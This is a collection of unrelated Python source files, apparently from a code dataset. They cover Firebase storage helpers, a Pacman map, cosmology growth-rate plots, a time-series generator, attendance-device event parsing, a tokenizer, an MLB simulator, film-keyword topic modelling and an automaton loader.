result.append(useSleep)
row = row +1
print(result)
write_excel(result)
if __name__ == '__main__':
read_excel(); |
998,321 | c8ec5fe316e8854ffe37d4a611a9e65ae37206d6 | # -*- coding: utf-8 -*-
from firebase_admin import storage
from helpers.helpers import mkdir_conditional
_bucket = storage.bucket()
def upload(blob_name: str, path: str):
blob = _bucket.blob(blob_name)
blob.upload_from_filename(path)
def download(blob_name: str, path: str):
blob = _bucket.blob(blob_name)
mkdir_conditional('public')
blob.download_to_filename(path)
def delete(blob_name: str):
blob = _bucket.blob(blob_name)
blob.delete() |
998,322 | c3ea9ba749860e66052684315f808df9aa664cef | #
# Example file for variables
#
# Declare a variable and initialize it
f = 0
# print(f)
# re-declaring the variable works
""" f = "abc"
print (f) """
# ERROR: variables of different types cannot be combined
# print("This is a string " + str(123))
# Global vs. local variables in functions
def FUNC():
global f
f = "XYZ"
print (f)
FUNC()
print (f) #this f is outside of FUNC()
del f
print (f) |
998,323 | b691ddc3bca8789924e3ba31e534533ef9f4b5bd | def print_bits( num ):
bits = ''
i = 0
while i < 16:
bit = (num & 1)
bits = str(bit) + bits
num = num >> 1
i += 1
if i % 4 == 0 and i != 16:
bits = ' ' + bits
print( bits )
def insert_bits( n, m, i, j ):
print_bits( n )
print_bits( m )
mask = -1
mask = mask << (j - i + 1)
for x in range(i):
mask = (mask << 1) + 1
val = (n & mask) | (m << i)
print_bits( val )
return val
if __name__ == '__main__':
insert_bits( 64, 6, 3, 5 ) |
998,324 | 95e23a76d96b93aabcd243cd95de1dbe1502b0f3 | import pyglet
from ghost import Ghost, GhostUpDown, GhostLeftRight, GhostAimBot
class Mapp:
def __init__(self, filename, pacman):
self.pacman = pacman
self.data = []
self.ghosts = []
with open(filename) as f:
for line in f:
self.data.append(line)
self.wall = pyglet.resource.image('W.png')
ghost_y = 0
for line in self.data:
ghost_x = 0
for spot in line:
if spot == '1':
g =GhostLeftRight()
g.set_position(ghost_x, ghost_y)
self.ghosts.append(g)
elif spot == '2':
g = GhostUpDown()
g.set_position(ghost_x, ghost_y)
self.ghosts.append(g)
elif spot == '3':
g = GhostAimBot()
g.set_position(ghost_x, ghost_y)
g.state = g.get_direction_to_pacman(self.pacman)
self.ghosts.append(g)
ghost_x += 32
ghost_y += 32
def draw(self):
wall_y = 0
for line in self.data:
wall_x = 0
for spot in line:
if spot == '#':
self.wall.blit(wall_x, wall_y)
wall_x += 32
wall_y += 32
def set_position(self, character, p):
for line_number, line in enumerate(self.data):
for column_number, spot in enumerate(line):
if spot == character:
x = column_number * 32
y = line_number * 32
p.set_position(x, y)
def is_position_on_the_wall(self, xx, yy):
nk = int(xx // 32)
nl = int(yy // 32)
line = self.data[nl]
spot = line[nk]
return spot == "#"
def character_touches_wall(self, p):
w1 = self.is_position_on_the_wall(p.x, p.y)
w2 = self.is_position_on_the_wall(p.x + 32 - 1, p.y)
w3 = self.is_position_on_the_wall(p.x + 32 - 1, p.y + 32 - 1)
w4 = self.is_position_on_the_wall(p.x, p.y + 32 - 1)
return w1 or w2 or w3 or w4
|
998,325 | 96d8b3416f4aa82d64a235e602547d4a5731002a | # We will use examine the effects that Horndeski models of
# modified gravity/dark energy have on the growth rate of
# structure fsigma8(z) from redshift z=6 to z=0.
# Parameterization of background: 'lcdm'
# Parameterization of gravity: 'hill_scale'
import numpy as np
import matplotlib.pyplot as plt
#To use LaTeX and select Helvetica as the default font:
from matplotlib import rc
rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
## for Palatino and other serif fonts use:
#rc('font',**{'family':'serif','serif':['Palatino']})
rc('text', usetex=True)
from classy import Class
def D(z):
"""
Linear growth function
D(z) = ( P(k_ls, z) / P(k_ls, 0) )^(1 / 2)
where k_ls is a large-scale mode.
"""
k=0.01 #Our choice of large-scale mode
mPk=cosmo.pk(k,z)
mPk_norm=cosmo.pk(k,0) #Normalize at z=0
D=np.sqrt(mPk/mPk_norm)
return D
def f(z):
"""
Linear growth rate f(z) where
f(a) = d log D / d log a
where a = 1 / (1 + z) is the scale factor.
"""
a=1./(1.+z)
#da=0.01
da=0.01*a
#da=1e-7
gp,g,gm=[D(1./ia-1.) for ia in [a+da,a,a-da]]
f=a*(gp-gm)/(2*g*da)
#dz=0.01
#gp,g,gm=[D(zi) for zi in [z+dz,z,z-dz]]
#f=(z)*(gp-gm)/(2.*g*dz)
return f
def sigma8(z):
"""
sigma8(z) = sigma8*D(z)
"""
s8=cosmo.sigma8()*D(z)
return s8
def fsigma8(z):
"""
Growth rate of structure
fsigma8(z) = f(z) * sigma8(z)
"""
fs8=f(z)*sigma8(z)
return fs8
def reldev(y1, y2):
"""
Calculate the relative percent deviation between LCDM
and non-LCDM outputs
"""
return 100.*(y2-y1)/y1
### Our redshift range ###
# We want to see the behavior of fsigma8 from early
# to late times i.e. redshifts 0 to 1000.
# particularly, we want to show that our MG models of
# fsigma8 reduce to LCDM at early times.
zlist = np.linspace(0.011, 1000., 5000.)
#zstr=','.join(map(str,zlist+zlist[-1]+2))
zstr=str(zlist[-1]+2.)
### The LCDM model ###
lcdmpars = {'output': 'mPk',
'P_k_max_h/Mpc':20,
'z_pk': zstr,
'background_verbose': 1, #Info
'tau_reio': 0.07,
'omega_cdm': 0.11987,
'A_s': 2.204e-9,
'h': 0.6715918, #computed from 100*theta_s=1.042143
'N_ur': 3.046-1.,
'N_ncdm': 1.,
'm_ncdm': 0.06,
'omega_b': 0.022252,
'n_s': 0.96475,
}
cosmo = Class() #create universe
cosmo.set(lcdmpars) #feed params to cosmos
cosmo.compute()
lcdm_fsigma8=np.array([fsigma8(z) for z in zlist])
### Modified Gravity models ###
## Modifying gravity: alpha_T = 0, ^alpha_K = 0.1, ^alpha_M = 0.1, varying ^alpha_B = 0 ##
pars = {'output': 'mPk',
'P_k_max_h/Mpc':20,
'z_pk': zstr,
'background_verbose': 1, #Info
'tau_reio': 0.07,
'omega_cdm': 0.11987,
'A_s': 2.204e-9,
'h': 0.6715918, #computed from 100*theta_s=1.042143
'N_ur': 3.046-1.,
'N_ncdm': 1.,
'm_ncdm': 0.06,
'omega_b': 0.022252,
'n_s': 0.96475,
'Omega_Lambda': 0, #no cosmological constant
'Omega_fld': 0, #no perfect fluid DE
'Omega_smg': -1, #Omega_DE -- use closure relation to
#find the density of modified gravity
'gravity_model': 'hill_scale',
'expansion_model': 'lcdm' #model for rho_DE(tau)
}
# Fiducial Horndeski coupling values and M_*^2,ini
M=1.
a_K = 0.001#0.1#1.e-6 #Seems to actually have an effect. See: 0.1, and 1.0 difference
a_B = 0.#0.005
a_M = 0.1 #Note: 1 and greater is insane.
a_T = 0.#1e-30
# Transition scale factor and rapidity
a_trans = 1. / (1. + 7.)
a_rapidity = 4.#3./2.#0.01
# Varying a_B
a_B_mg_fsigma8={}
a_B_mg_list=[0.10, 0.11, 0.12, 0.13, 0.14, 0.15, 0.16] #a_M = 0.1, zt=7, a_r=4.
for a_B in a_B_mg_list:#, 0.4, 0.6, 0.8]:
pars['parameters_smg'] = "{}, {}, {}, {}, {}, {}, {}".format(
M, a_K, a_B, a_M, a_T, a_trans, a_rapidity)
cosmo=Class()
cosmo.set(pars)
cosmo.compute()
a_B_mg_fsigma8[a_B] = np.array([fsigma8(z) for z in zlist])
## Reproducing LCDM: ^alpha_T = 0, ^alpha_K = 0.1, ^alpha_M = ^alpha_B = 0 ##
pars = {'output': 'mPk',
'P_k_max_h/Mpc':20,
'z_pk': zstr,
'background_verbose': 1, #Info
'tau_reio': 0.07,
'omega_cdm': 0.11987,
'A_s': 2.204e-9,
'h': 0.6715918, #computed from 100*theta_s=1.042143
'N_ur': 3.046-1.,
'N_ncdm': 1.,
'm_ncdm': 0.06,
'omega_b': 0.022252,
'n_s': 0.96475,
'Omega_Lambda': 0, #no cosmological constant
'Omega_fld': 0, #no perfect fluid DE
'Omega_smg': -1, #Omega_DE -- use closure relation to
#find the density of modified gravity
'gravity_model': 'hill_scale',
'expansion_model': 'lcdm' #model for rho_DE(tau)
}
# Fiducial Horndeski coupling values and M_*^2,ini
_M=1.
_a_K = 0.001#1.e-6
_a_B = 0.
_a_M = 0.
_a_T = 0.
pars['parameters_smg'] = "{}, {}, {}, {}, {}, {}, {}".format(
_M, _a_K, _a_B, _a_M, _a_T, a_trans, a_rapidity)
cosmo=Class()
cosmo.set(pars)
cosmo.compute()
mg_lcdm_fsigma8 = np.array([fsigma8(z) for z in zlist])
### Plot fsigma8(z) for LCDM and Horndeski gravity ###
f, ax = plt.subplots(2, 1, figsize=(15/1.5, 10/1.5), sharex='col')
# First plot LCDM results
ax[0].semilogx(zlist, lcdm_fsigma8,
dashes=[6,4], color='black',
zorder=2)
ax[0].set_ylabel(r'$f\sigma_8$')
ax[1].semilogx(zlist, reldev(lcdm_fsigma8, lcdm_fsigma8),
dashes=[6,4], color='black',
label=r'$\Lambda\mathrm{CDM}$',
zorder=2)
ax[1].set_ylabel('$\mathrm{rel. dev. [\%]$}')
ax[1].set_xlabel(r'$z$')
ax[1].set_ylim(-0.25, 0.05) ###
# Now plot the MG/DE results
# Reproducing LCDM
ax[0].plot(zlist, mg_lcdm_fsigma8,
zorder=1)
ax[1].plot(zlist, reldev(lcdm_fsigma8, mg_lcdm_fsigma8),
label=r'$\hat{{\alpha}}_\mathrm{{B}}={}, \hat{{\alpha}}_\mathrm{{M}}={}$'.format(_a_B, _a_M),
zorder=1)
# MG
for a_B in a_B_mg_list:
ax[0].plot(zlist, a_B_mg_fsigma8[a_B],
zorder=1)
ax[1].plot(zlist, reldev(lcdm_fsigma8, a_B_mg_fsigma8[a_B]),
label=r'$\hat{{\alpha}}_\mathrm{{B}}={}, \hat{{\alpha}}_\mathrm{{M}}={}$'.format(a_B, a_M),
zorder=1)
plt.tight_layout()
# Remove whitespace between upper and lower plots
plt.subplots_adjust(hspace=0, wspace=0.3)
# Tick marks on all sides of each plot
for j in range(2):
#for i in range(2):
axes=ax[j]
axes.tick_params(axis='both', which='both', direction='in',
top=True, right=True)
legend=axes.legend(framealpha=0)
#plt.savefig('fsigma8_Horndeski_hill_scale_braiding_planck_mass_run_rate_z_0_to_1000.pdf', format='pdf')
plt.savefig('fsigma8_Horndeski_hill_scale_braiding_planck_mass_run_rate_z_0_to_1000_close_up.pdf', format='pdf')
plt.show()
|
998,326 | f0a7fe81f5f22ab998219512c496689b5f2a9641 | filepath = 'learning_python.txt'
with open(filepath) as file_object:
data = file_object.read()
print(data)
print()
with open(filepath) as file_object:
for object in file_object:
print(object.strip())
print()
with open(filepath) as file_object:
lines = file_object.readlines()
for line in lines:
print(line.strip()) |
998,327 | de8e77d5d0d7fbb841abd4b3575decbd7bb01894 | def generator(data, lookback, delay, min_index, max_index, shuffle=False, batch_size=128, step=6):
"""
Perform Python generator that takes the current array of time series data and yields
batches of data from the recent past, along with a target. It can be used for MIMO, SISO, MISO, and SIMO.
Parameters
----------
data : numpy.ndarray
2d tensor of shape (timesteps, input_features)
lookback: int
How many timesteps back the input data should go.
delay: int
How many timesteps in the future the target should be.
min_index and max_index: int
Indices in the data array that delimit which timesteps to draw from.
shuffle: boolean
Whether to shuffle the samples or draw them in chronological order.
batch_size: int
The number of samples per batch.
step: int
The period, in timesteps, at which you sample data.
Returns
-------
samples : 3d tensor
timeseries samples (batch_size, timesteps_lookback, number_inputs_features)
targets: 2d tensor
timeseries targets (batch_size, number_targets)
"""
if max_index is None:
max_index = len(data) - delay - 1
i = min_index + lookback
while 1:
if shuffle:
rows = np.random.randint(min_index + lookback, max_index + 1, size=batch_size)
else:
if i + batch_size >= max_index:
i = min_index + lookback
rows = np.arange(i, min(i + batch_size, max_index + 1))
i += len(rows)
samples = np.zeros((len(rows), lookback // step, data.shape[-1]))
targets = np.zeros((len(rows),data.shape[-1]))
for j, row in enumerate(rows):
indices = range(rows[j] - lookback, rows[j], step)
samples[j] = data[indices]
targets[j] = data[rows[j] + delay]
yield samples, targets
Example:
data_ex = np.random.random((100,3))
lookback = 10
step = 1
delay = 1
batch_size = 128
train_gen = generator(data_ex,
lookback=lookback,
delay=delay,
min_index=0,
max_index=50,
shuffle=True,
step=step,
batch_size=batch_size)
validation_gen = generator(data_ex,
lookback=lookback,
delay=delay,
min_index=51,
max_index=75,
step=step,
batch_size=batch_size)
test_gen = generator(data_ex,
lookback=lookback,
delay=delay,
min_index=76,
max_index=None,
step=step,
batch_size=batch_size)
# Access the data
xi, yo = next(train_gen)
# xi shape is (128, 10, 3)
# yo shape is (128, 3)
|
998,328 | e0590bacd1b8ceb72806a7dacd2d0ce5ba9072e6 | import struct
import pyzatt.zkmodules.defs as DEFS
"""
This file contains the functions to extract info of realtime events
incoming from attendance devices.
Author: Alexander Marin <alexuzmarin@gmail.com>
"""
class RealtimeMixin:
def enable_realtime(self):
"""
Sends command to enable realtime events.
:return: None.
"""
self.send_command(cmd=DEFS.CMD_REG_EVENT,
data=bytearray([0xff, 0xff, 0x00, 0x00]))
self.recv_reply()
def get_last_event(self):
"""
Returns the last event code.
:return: Integer, last event code(as given on the session id field).
"""
return self.last_event_code
def parse_alarm_type(self):
"""
Extracts the alarm type of the last event.
:return: Integer, alarm type, if it fails to extract the alarm type,
returns -1.
"""
alarm_type = -1
if self.last_event_code == DEFS.EF_ALARM:
alarm_type = struct.unpack('<I', self.last_payload_data[0:4])[0]
return alarm_type
def parse_duress_alarm(self):
"""
Extracts info from an alarm event packet.
:return: List [Integer, Integer, Integer].
Where the elements of the list are:
1. Alarm type.
2. User's index.
3. Matching way.
If it fails tos extract those fields, returns a
list of -1 values [-1,-1,-1].
"""
alarm_type = -1
sn = -1
match_type = -1
if self.last_event_code == DEFS.EF_ALARM:
alarm_type = struct.unpack('<H', self.last_payload_data[4:6])[0]
sn = struct.unpack('<H', self.last_payload_data[6:8])[0]
match_type = struct.unpack('<I', self.last_payload_data[8:12])[0]
return [alarm_type, sn, match_type]
def parse_event_attlog(self):
"""
Extracts info from a attendance event.
:return: List [Str, Integer, Str].
Where the elements of the list are:
1. User's ID.
2. Verification type, (password=0, fp=1, rfid=2).
3. Date string, with the format yyyy/mm/dd HH:MM:SS.
If it fails to extract these values, returns ['',-1,''].
"""
uid = ''
ver_type = -1
date_str = ''
if self.last_event_code == DEFS.EF_ATTLOG:
uid = self.last_payload_data[0:9].decode('ascii').\
replace('\x00', '')
ver_type = struct.unpack('<H', self.last_payload_data[24:26])[0]
date_str = "20%i/%i/%i %i:%i:%i" %\
tuple(self.last_payload_data[26:32])
return [uid, ver_type, date_str]
def parse_event_enroll_fp(self):
"""
Extracts info from an enrolled fingerprint event.
:return: List [Bool, Str, Integer, Integer].
Where the elements of the list are:
1. Enroll result, True if it was successful.
2. User ID.
3. Finger index of the fingerprint.
4. Fingerprint template size.
If it fails to extract these values, returns [False,'',-1,-1].
"""
uid = ''
fp_idx = -1
fp_size = -1
enroll_flg = False
if self.last_event_code == DEFS.EF_ENROLLFINGER:
enroll_flg = True if \
struct.unpack('<H', self.last_payload_data[0:2])[0] == 0\
else False
uid = self.last_payload_data[4:13].decode('ascii').\
replace('\x00', '')
fp_idx = self.last_payload_data[13]
fp_size = struct.unpack('<H', self.last_payload_data[2:4])[0]
return [enroll_flg, uid, fp_idx, fp_size]
def parse_score_fp_event(self):
"""
Extracts the score of a given fingerprint sample in a enrolling
procedure.
:return: Integer, the score may be 100(valid) or 0(invalid),
returns -1 if it fails to extract the score.
"""
score = -1
if self.last_event_code == DEFS.EF_FPFTR:
score = self.last_payload_data[0]
return score
def wait_for_fingerscore(self):
"""
Blocks execution until a finger score event is received.
:return: Integer, the score may be 100(valid) or 0(invalid),
returns -1 if it fails to extract the score.
"""
while True:
self.recv_event()
if self.last_event_code == DEFS.EF_FPFTR:
return self.parse_score_fp_event()
def parse_verify_event(self):
"""
Extracts the user index from a verify event packet.
:return: Integer, user internal index on machine, returns -1 if it
the packet doesn't correspond to a EF_VERIFY event.
"""
user_sn = -1
if self.last_event_code == DEFS.EF_VERIFY:
user_sn = struct.unpack('<I', self.last_payload_data[0:4])[0]
if self.last_payload_data[4] != 1:
print('Found value different of 1 on verify packet: %' %
(self.last_payload_data[4]))
return user_sn
|
998,329 | da8aa8fd1c2978000911c79f3f09635e6c250166 | from consts import *
def read_number(string):
status = STATUS_NEW
ret = 0
for c in string:
if c not in NUMBER:
break
if status == STATUS_NEW:
if c == '.':
status = STATUS_POINT
elif status == STATUS_POINT:
if c == '.':
break
ret += 1
return string[ret:], 'NUMBER', string[:ret]
def read_word(string):
status = STATUS_NEW
ret = 0
for c in string:
if c not in WORD:
break
if status == STATUS_NEW:
if c in NUMBER:
break
else:
status = STATUS_POINT
ret += 1
word = string[:ret]
ret_type = 'WORD'
ret_type = 'KEYWORD' if word in KEYWORD else ret_type
ret_type = 'TYPE' if word in TYPE else ret_type
return string[ret:], ret_type, string[:ret]
def read_operator(string):
ret = 0
for c in string:
if c not in OPERATOR:
break
ret += 1
return string[ret:], 'OPERATOR', string[:ret]
def read_punctuator(string):
status = STATUS_NEW
punctuator = str()
ret = 0
if len(string) > 0:
if string[0] in PUNCTUATOR:
ret = 1
punctuator = string[0]
return string[ret:], 'PUNCTUATOR', punctuator
def read_const(string):
status = STATUS_NEW
str_const = str()
ret = 0
for c in string:
if status == STATUS_NEW:
if c == '"':
status = ONE_QUOTATION
else:
break
elif status == ONE_QUOTATION:
if c == '"':
status = TWO_QUOTATION
ret += 1
if status == TWO_QUOTATION:
break
if status != TWO_QUOTATION:
ret = 0
return string[ret:], 'CONST', string[:ret]
|
998,330 | b8215a6de290ebb3a81e77f1226bcfed3a4934c3 | import json
import requests
import game as g
class Menu:
def __init__(self):
print("***Welcome to MLB Simulator***")
self.team1 = []
self.team2 = []
def pickPlayer(self):
while True:
player = input()
response = requests.get("http://lookup-service-prod.mlb.com/json/named.search_player_all.bam?sport_code='mlb'&name_part='"+ player +"%'")
data = response.json()["search_player_all"]["queryResults"]
length = int(data["totalSize"])
if length == 0 :
print("Found no players please try again")
elif length == 1 :
print("You choose " + data["row"]["name_display_first_last"])
player_id = data["row"]["player_id"]
break
else:
print("Found " + data["totalSize"] + ": The first "+ str(min(5, length)) +" are")
for x in range(0, min(5, length)):
print(str(x + 1) + ": " + data["row"][x]["name_display_first_last"] + ", Born " + data["row"][x]["birth_date"])
i = input("To pick one of first five enter 1-5 or press enter to continue: ")
if i.isdigit() and int(i) >= 1 and int(i) <= min(5, length) :
player_id = data["row"][int(i) - 1]["player_id"]
break
print("Pick a player")
while True:
year = input("Pick a year for player stats: ")
response = requests.get("https://statsapi.mlb.com/api/v1/people/"+player_id +"/stats?stats=statsSingleSeason&gameType=R&season="+ year)
length = len(response.json()["stats"])
if(length == 0):
print("Player did not play in " + year)
else:
break
return {"player_id": player_id, "name" : player,"year": year}
def startup(self):
print("Press Enter to Pick Home Team:")
input()
for i in range(0,9) :
print("Pick Next Batter")
self.team1.append(self.pickPlayer())
print("Pick Home Team Pitcher")
pitcher1 = self.pickPlayer()
print("Press Enter to Pick Away Team:")
input()
for i in range(0,9) :
print("Pick Next Batter")
self.team2.append(self.pickPlayer())
print("Pick Away Team Pither")
pitcher2 = self.pickPlayer()
game = g.Game(self.team1, self.team2, [pitcher1], [pitcher2])
print("Press Enter to Play:")
input()
response = 'r'
game.play()
while True:
print("[r] to replay game")
print("[p] to start new game")
print("[q] to quit simulator")
response = input()
if response == "r":
game.replay()
elif response == "p" or response == "q":
break
if response == 'p':
self.startup()
|
998,331 | f9d872c3b56d8cd0dda76af75ba29ea290f92692 | lines = [line.rstrip('\n') for line in open('in.txt')]
num2 = 0
num3 = 0
for x in lines:
bk = {}
for y in x:
if y not in bk:
bk[y] = 1
else:
bk[y] += 1
check_num = bk.values()
if 2 in check_num:
num2 += 1
if 3 in check_num:
num3 += 1
print(num2*num3)
|
998,332 | e323127a49204b61cab0caf64ae47acf192ec0e5 | # This code was converted to Python3 from the Python2 code from the Youtube channel "Numberphile".
# the two videos: https://youtu.be/Wim9WJeDTHQ & https://youtu.be/E4mrC39sEOQ
def per(n, steps = 0):
if len(str(n)) == 1:
print(n)
print('Total Steps ' + str(steps))
return 'DONE'
steps += 1
digits = [int(i) for i in str(n)]
result = 1
for j in digits:
result *= j
if len(str(n)) != 1:
print(result)
per(result, steps)
|
998,333 | 1efa379e153b44edfa25b4fe8a783b0593f2b6cb | from Auxiliary.Loader import Loader_IEMOCAP_Both
from Model.BLSTMwMultiAttention import BLSTMwMultiAttention
from Auxiliary.TrainTemplate import Template_FluctuateSize_BothFeatures
if __name__ == '__main__':
cudaFlag = True
metaFlag, multiFlag = False, True
for attentionName in ['StandardAttention', 'LocalAttention', 'ComponentAttention', 'MonotonicAttention']:
for appointGender in ['Female', 'Male']:
for appointSession in range(1, 6):
Model = BLSTMwMultiAttention(
attentionName=[attentionName, attentionName], attentionScope=[10, 10],
attentionParameter=['LeftAttention', 'RightAttention'], featuresNumber=120 if multiFlag else 40,
cudaFlag=cudaFlag)
savePath = 'D:/PythonProjects_Data/IEMOCAP_Result_Test/BLSTMwBothAttention%s%s/%s/%s-%d' % (
'_Meta' if metaFlag else '', '_Multi' if multiFlag else '', attentionName, appointGender,
appointSession)
trainDataset, testDataset = Loader_IEMOCAP_Both(
appointGender=appointGender, appointSession=appointSession, batchSize=32, metaFlag=metaFlag,
multiFlag=multiFlag)
Template_FluctuateSize_BothFeatures(Model=Model, trainDataset=trainDataset, testDataset=testDataset,
cudaFlag=cudaFlag, savePath=savePath)
|
998,334 | db49392f1fb290d6cce43e2a4e582f9fdc4ba489 | import math
import cmath
import sys
import string
import heapq
import bisect
from queue import Queue,PriorityQueue,LifoQueue
from collections import Counter,deque
from itertools import permutations,combinations
from functools import cmp_to_key
def power(base,exponent):
res = 1
while exponent:
if exponent & 1: # 判断当前的最后一位是否为1,如果为1的话,就需要把之前的幂乘到结果中。
res *= base
base *= base # 一直累乘,如果最后一位不是1的话,就不用了把这个值乘到结果中,但是还是要乘。
exponent = exponent >> 1
return res
power()
import math
import cmath
import sys
import string
import heapq
import bisect
import copy
from queue import Queue, PriorityQueue, LifoQueue
from collections import Counter, deque
from itertools import permutations, combinations
from functools import cmp_to_key, reduce
# def quick(base, exp):
# res = 1
# while exp:
# if exp & 1:
# res = (res * base)%100003
# base = (base * base)%100003
# exp = exp >> 1
# return res
#
#
# if __name__ == "__main__":
# m, n = list(map(int, input().strip().split()))
# # print(gcd(15,6))
# h = quick(m, n)
# k = quick(m - 1, n - 1)
# print((h % 100003 - (m * k) % 100003 + 100003) % 100003) |
998,335 | 3a325af0b090e0c410fc90a8975c0f7624fba8ed | from cinema.models import Film, Genre
from service.objects import CachedObject
from service.vectorizers import *
import service.filmsfilter as flt
from sklearn.feature_extraction import DictVectorizer
import re
filtered_films = flt.filter1()
indexes = hashIndexes(filtered_films.iterator())
cDict = CachedObject('keywords')
if cDict.checksum != str(hash(''.join(indexes.keys()))):
print("Computing the keywords sparse matrix ...")
gkey = genKeywords(filtered_films.iterator())
indexes = hashIndexes(filtered_films.iterator())
v = DictVectorizer(dtype=int)
X0 = v.fit_transform(gkey)
feature_names = v.get_feature_names()
cDict.set_content((feature_names, X0))
cDict.checksum = str(hash(''.join(indexes.keys())))
cDict.save()
else:
feature_names, X0 = cDict.get_content()
filmsbygenre = {}
keywordsbygenre = {}
for genre in Genre.objects.all():
filmsbygenre[genre.name] = map(lambda e : indexes[e], map(lambda e: e.imdb_id, filtered_films.filter(genres = genre)))
if filmsbygenre[genre.name] == []:
keywordsbygenre[genre.name] = np.zeros(X0.shape[1])
else:
keywordsbygenre[genre.name] = np.sum(X0[filmsbygenre[genre.name]].toarray(), axis=0)
rex = re.compile('male')
[m for m in feature_names if rex.search(m)]
np.array(feature_names)[np.argsort(-keywordsbygenre['Action'])]
from sklearn.feature_extraction.text import TfidfTransformer
X = TfidfTransformer().fit_transform(X0)
k = 40 # wanted number of topics
### SVD DECOMPOSITION (LSA) ##
### USING GENSIM #############
ans = raw_input("Start Latent Semantic Analysis with Gensim ? ")
if ans != "y":
exit()
from gensim.models.lsimodel import LsiModel
from gensim.matutils import Sparse2Corpus, corpus2dense
co = Sparse2Corpus(X, documents_columns = False)
lsi = LsiModel(corpus=co, num_topics=k)
list_topics = lsi.show_topics(formatted=False)
topics = map(lambda li : [(value, feature_names[int(key)]) for (value, key) in li] ,list_topics)
print(topics)
genreMat = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
obj = lsi[Sparse2Corpus(X[index, :], documents_columns = False)]
E = corpus2dense(obj, k).transpose()
genreMat.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat = np.vstack(genreMat)
print genreMat
### USING SCIKIT-LEARN #######
ans = raw_input("Start Latent Semantic Analysis with Scikit-Learn ? ")
if ans != "y":
exit()
from sklearn.decomposition import TruncatedSVD
svd = TruncatedSVD(n_components = k, n_iterations = 100)
y = svd.fit_transform(X)
topics2 = [[(svd.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(svd.components_[l]))[:10]] for l in range(k)]
print topics2
genreMat2 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat2.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat2.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat2 = np.vstack(genreMat2)
print genreMat2
index = filmsbygenre['Action']
E = y[index, :]
### PCA ######################
ans = raw_input("Start PCA with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import PCA
pca = PCA(n_components = k, whiten=True)
y = pca.fit_transform(X.todense())
topics3 = [[(pca.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(pca.components_[l]))[:10]] for l in range(k)]
print topics3
genreMat3 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat3.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat3.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat3 = np.vstack(genreMat3)
print genreMat3
index = filmsbygenre['Action']
E = y[index, :]
### FASTICA ###################
ans = raw_input("Start FastICA with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import FastICA
ica = FastICA(n_components = k, whiten=True)
y = ica.fit_transform(X.todense())
topics4 = [[(ica.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(ica.components_[l]))[:10]] for l in range(k)]
print topics4
genreMat4 = []
for genre in Genre.objects.all():
index = filmsbygenre[genre.name]
if index != []:
E = y[index, :]
genreMat4.append( np.hstack([ [genre.name] , np.mean(E, axis = 0)]) )
else:
genreMat4.append( np.hstack([ [genre.name] , np.zeros(k) ] ))
genreMat4 = np.vstack(genreMat4)
print genreMat4
index = filmsbygenre['Action']
E = y[index, :]
### K-Means ###################
ans = raw_input("Start K-Means with Scikit ? ")
if ans != "y":
exit()
from sklearn.cluster import MiniBatchKMeans, KMeans
km = MiniBatchKMeans(n_clusters=k, init='k-means++', n_init=1, init_size=1000, batch_size=1000, verbose=1)
km2 = KMeans(n_clusters = k, init='k-means++', verbose=1)
y2 = km2.fit_transform(X)
topics5 = [[(km.cluster_centers_[l][i], feature_names[i]) for i in np.argsort(-np.abs(km.cluster_centers_[l]))[:10]] for l in range(k)]
print topics5
### NMF #######################
ans = raw_input("Start NMF with Scikit ? ")
if ans != "y":
exit()
from sklearn.decomposition import ProjectedGradientNMF
# BEWARE : THIS IS COMPUTATIONNALY INTENSIVE
nmf = ProjectedGradientNMF(n_components=k, max_iter = 10, nls_max_iter=100)
nmf.fit(X)
topics6 = [[(nmf.components_[l][i], feature_names[i]) for i in np.argsort(-np.abs(nmf.components_[l]))[:10]] for l in range(k)] |
998,336 | 198e641843b8fb2933cd4ba5189b86b6e112644f | import re
import xlrd
class Automaton:
ndfa = False
def __init__(self, automaton_name, states=None, edges=None):
self.automaton_name = automaton_name
if states is None :
self.states = []
else:
self.states = states
if edges is None :
self.edges = []
else:
self.edges = edges
@classmethod
def read_from_xls(cls, automaton_file):
information_sheet = automaton_file.sheet_by_index(0)
automaton_sheet = automaton_file.sheet_by_index(1)
automaton_initial_state_id = information_sheet.cell_value(1,1)
automaton_final_state_id = information_sheet.cell_value(2,1)
automaton_initial_state = State
automaton_final_state = State
automaton_states = []
for i in range(1,automaton_sheet.ncols):
automaton_edges = []
is_initial = False
is_final = False
for b in range(1,automaton_sheet.nrows):
if automaton_sheet.cell_value(i,b) == 'E' and automaton_sheet.cell_value(i,b) != 'x':
Automaton.ndfa = True
edge_accepted_values = automaton_sheet.cell_value(i,b)
initial_state = automaton_sheet.cell_value(i,0)
final_state = automaton_sheet.cell_value(0,b)
automaton_edges.append(Edge(initial_state,final_state,edge_accepted_values))
elif automaton_sheet.cell_value(i,b) != 'x':
edge_accepted_values = re.split(',',automaton_sheet.cell_value(i,b))
initial_state = automaton_sheet.cell_value(i,0)
final_state = automaton_sheet.cell_value(0,b)
automaton_edges.append(Edge(initial_state,final_state,edge_accepted_values))
if automaton_sheet.cell_value(i,0) == automaton_initial_state_id:
is_initial = True
state = State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges)
automaton_states.append(state)
automaton_initial_state = state
elif automaton_sheet.cell_value(i,0) == automaton_final_state_id:
is_final = True
state = State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges)
automaton_states.append(state)
automaton_final_state = state
else:
automaton_states.append(State(automaton_sheet.cell_value(i,0),is_initial,is_final,automaton_edges))
if Automaton.ndfa:
return NDFA("AutomatonNDFA",automaton_initial_state,automaton_final_state,automaton_states)
else:
return DFA("AutomatonDFA",automaton_initial_state,automaton_final_state,automaton_states)
class State:
